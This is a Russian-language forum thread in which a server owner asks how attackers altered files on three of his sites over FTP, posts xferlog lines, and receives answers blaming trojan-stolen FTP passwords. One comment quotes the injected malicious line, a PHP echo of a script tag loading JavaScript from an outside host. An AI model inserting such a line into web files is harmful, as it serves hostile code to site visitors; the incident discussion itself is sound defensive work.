Как могли взломать сайт?

Question

[Денис]

Добрый день!

На одном из подопытных серверов перед новым годом произошел взлом, в ходе которого в несколько файлов был внедрен вредоносный скрипт.

Что имеем:

— взломано 3 сайт (из-под трех разных пользователей), хотя всего сайтов несколько больше. Мотив?
— файлы были целенаправленно изменены по ftp (в логе xferlog 12 файлов трех сайтов были скачана и тут же загружены)

Sat Dec 29 07:24:00 2012 0 ::ffff:188.72.248.226 117 [filename] a _ o r [user1] ftp 0 * c
Sat Dec 29 07:24:00 2012 0 ::ffff:188.72.248.226 185 [filename] a _ i r [user1] ftp 0 * c
Sat Dec 29 07:24:01 2012 0 ::ffff:188.72.248.226 253 [filename2] a _ o r [user1] ftp 0 * c
Sat Dec 29 07:24:01 2012 0 ::ffff:188.72.248.226 337 [filename2] a _ i r [user1] ftp 0 * c

— вход по ssh запрещен в системе

Что хотелось бы узнать:
— как произошел взлом — это был перебор пароля?
— можно ли посмотреть историю авторизации по ftp на стандартных настройках proftpd? auth.log молчит

Comments

[Денис]

Вредоносный код:
echo '<script src="http://kinoshkaxa.changeip.name/rsize.js"></script>';

Answer 1

[Валерий Селицкий]

Истории былинные:
Кто-то из имеющих доступ к ftp словил троянца.
Кто-то сохранивший авторизационные данные в ftp-клиенте допустил утечку (например снова словил троянца или расшарил Program Files в сеть)

Comments

[Денис]

Хм. Было одно дельце…
Обращался ко мне сотрудник, у которого на компе с работающим nod32 был подхвачен троянец.
У него контакт тогда сломили…
Долго чистил от троянчика. Щас название не вспомню. На работе записан.
У него могли быть эти пароли.

[Валерий Селицкий]

Такой воркфлоу как правило автоматизирован — логи и пароль перехыватываются — шлются на мастер-сервер, который авторизуется и в знакомых ему файлах (например — index.php, default.html) добавляет строку с гадостью, я сталкивался с такой вещью еще года 4 назад.

Answer 2

[IStudio]

А есть вариант запретить навсегда ftp и пользоваться всегда ssh?

Answer 3

[avgaltsev]

Нас однажды тоже взломали через proftpd, внедрили в сайт зловредные скрипты. Причем взломали не брутфорсом, пароли у нас сложные стоят.
Перешли на vsftpd, с тех пор не ломали пока.

Answer 4

[Howeal]

Скорее всего это автоматизированный бот, который заражает сайты по FTP. Логины-пароли воруются троянцем.

Answer 5

[eresik]

У меня тоже сегодня такое случилось. Именно такая же модификация файлов.
За несколько дней до этого защитник виндовс8 удалял вирус. Видимо как раз таки тот вирус и украл пароли.
Пароли именно украдены, а не подобраны, т.к. хостер прислал логи, там неудачные попытки входа только мои.

Теоретически ведь можно обращаться в полицию по таким поводам? Ради спортивного интереса захотелось написать заявление. Чисто чтоб узнать чего в этом случае делают :)
Ох и мороки же было со сменой паролей на всём и вся, блин. Почты, сайты, банки и т.п.

Answer 6

[Михаил]

На сайтах используется Basic HTTP Authorization?

Comments

[Денис]

Нет.

сайт на Joomla
сайт на ZendFramework
сайт самописный

Answer 7

[startsevdenis]

Какая версия джумлы используется? Не так давно был взломан сайт через кривой аплодер в джумле.

Answer 8

[egorinsk]

Сколько раз уже говрили людям, не сохраняйте пароли на фтп, не сохраняйте, все трояны первым делом лезут и выковыривают их, нет, все равно сохраняют. Ну не жалуйтесь теперь.

Answer 9

[Пума Тайланд]

НУ как всегда у кого то украли пароли с компа трояном, 99 процентов случаев такие.

Answer 10

[g00dv1n]

Парни с exploit.in постарались наверное. (шутка).

Скорей всего угнали с компа конечно пароли.
Но иногда бывает просто, что уязвимая версия FTP стоит. Чекать можно тут https://www.exploit-db.com/